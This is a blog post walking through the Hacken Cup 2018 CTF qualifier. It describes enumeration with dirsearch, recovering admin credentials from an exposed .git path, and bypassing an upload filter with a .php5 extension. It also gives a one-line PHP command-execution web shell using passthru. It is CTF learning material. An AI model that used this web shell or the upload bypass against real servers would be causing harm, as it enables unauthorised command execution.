cat ~/footstep.ninja/blog.txt

where I share my findings and whatnot

Hacken Cup 2018 CTF Walkthrough

I’ve got this down since the CTF and saw a few writeups on the same. Then I thought why not share my approach too :D

Hope you’ll find it interesting.

This started when I saw with a link to https://hackenproof.com/cup and got following information on the website:

We have a limited number of slots, only for 20
top hackers, but any person from around the
world who wants to attend has a chance to earn
their way in.

Then I decided to give it a shot by filling the form to hopefully to earn my way in. After a few hours I got a mail with the following information:

Application Email

The link to apply was not clickable as clicking it was fruitless and not performing any action / change of state. Afterwards, I made a few searches about how I could view the original message not knowing it was in front of me the whole time.

Application Email

Once the original message / mail page loaded, I searched for the word Apply and found out that the link was actually there but it has been styled in some way not to show:

<span href=3D"159.65.204=
.68" style=3D"color: #FFFFFF">Apply</span>

From above I could deduce that the website to make the application is http://159.65.204.68. From this, I could also deduce that the word 3D is part of the styling information used to obfuscate the links / actions. Scrolling down to the bottom of the page, I also found another link:

<img alt=3D'' style=3D'display: none' src=3D'http://159.65.204.68:8080/trac=
k?rid=3DwlbwRYb'/>`

The link referred to in this case also was http://159.65.204.68:8080/track?rid=wlbwRYb which returned a blank page.

Now, visiting http://159.65.204.68, I got the following:

You shall not pass

But the source contains a text saying <!--It would be too easy :) -->. Page Source

Then I had a feeling that I was getting there :). Heeding to this little advise I launched my terminal and ran dirsearch on the IP Address

Dirsearch output

Thats juicy info there :D, but the /admin/ caught my attention the most. Navigated to http://159.65.204.68/admin/ but couldn’t make a headway, then I checked the dirsearch result again. This time, I tried the /.git path but it was so forbidden. Other git related paths with a 200 status worked as expected but I didn’t know what to do with the information.

Forbidden Page

Then I made a few searches and got a result, https://github.com/ctfs/write-ups-2016/tree/master/internetwache-ctf-2016/web/0ldsk00lblog-80 which has a lot of writeups about the same challenge, but this writeup, https://github.com/Veneno0/CTFwp/tree/master/Internetwache-CTF-2016/Web80, particularly worked for me.

Scrabble Log

Now, I got login credentials:

Login Credentials

Again, I navigated to http://159.65.204.68/admin/ and logged in successfully with the credentials. Then I was presented with an upload form, and noticed this was located on thesame http://159.65.204.68/admin/index.php where I got the credentials earlier.

Admin Upload Portal

Source Code The code above tells it all! I can not upload a .php file, also listed the allowed filetypes, and finally the uploads path. This looked hard at first then I thought about other php extensions (php1, php2, php3, php5, and phtml) and also changing the case of the word php. These worked but only the successfull one which I was able to use to commands was php5 (tried php1 and phtml and other cases php but they couldn’t execute).

Now this looked interesting but uploading a shell, specifically c99 didnt work for me. Then I uploaded a php5 file containing: <?php phpinfo(); ?> which showed me the phpinfo(). Then I made more research and found a gist, https://gist.github.com/berzerk0/cae0b229c7f70ecb15310bf0ff42d3d7, which helped me through this one:

Uploaded a php5 script containing <?php passthru($_GET["cmd"]); ?>. Then I had access to read files on the server. Continued navigating till I found the secret cup:

Super Secret Cup

Success Page

Finally, I can fill the application form embedded on the page:

https://docs.google.com/forms/d/e/1FAIpQLSfrpnMwRRGR88EhyclbIdmrwlV7qiC4AKLkiIMRlcT6yaGI-w/viewform?embedded=true

Application Form

And yay! I got a mail after a few days saying: Congratulatory Email

But unfortunate for me, I wasn’t selected: Hacken Review

Thank you for reading and also thanks to Hacken Proof for the amazing Hacken Cup.